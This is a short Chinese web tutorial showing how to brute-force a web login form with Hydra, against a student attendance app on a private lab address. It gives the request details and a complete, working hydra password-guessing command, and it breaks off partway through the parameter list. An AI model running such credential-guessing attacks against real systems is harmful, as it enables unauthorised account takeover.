网站导航
> 文章列表 > 九头蛇hydra爆破http示例

九头蛇hydra爆破http示例

网友: 文章列表 2024-03-21 15:47:15

九头蛇hydra爆破http示例

使用hydra执行http表单暴力破解

通过浏览器自带分析得知:

提交地址:http://10.0.0.115/student_attendance/ajax.php?action=login

提交方式:POST

提交数据:username=a&password=a

服务响应:3

根据以上收集的信息就可以使用hydra进行密码爆破 

hydra 10.0.0.115 http-form-post \"/student_attendance/ajax.php?action=login:username=^USER^&password=^PASS^:\\r\\n\\r\\n3\" -l admin -P MidPwds.txt -vV -f

参数说明

10.0.0.115 目标主机地址
http-form-post POST提交方

网络标签:

相关问题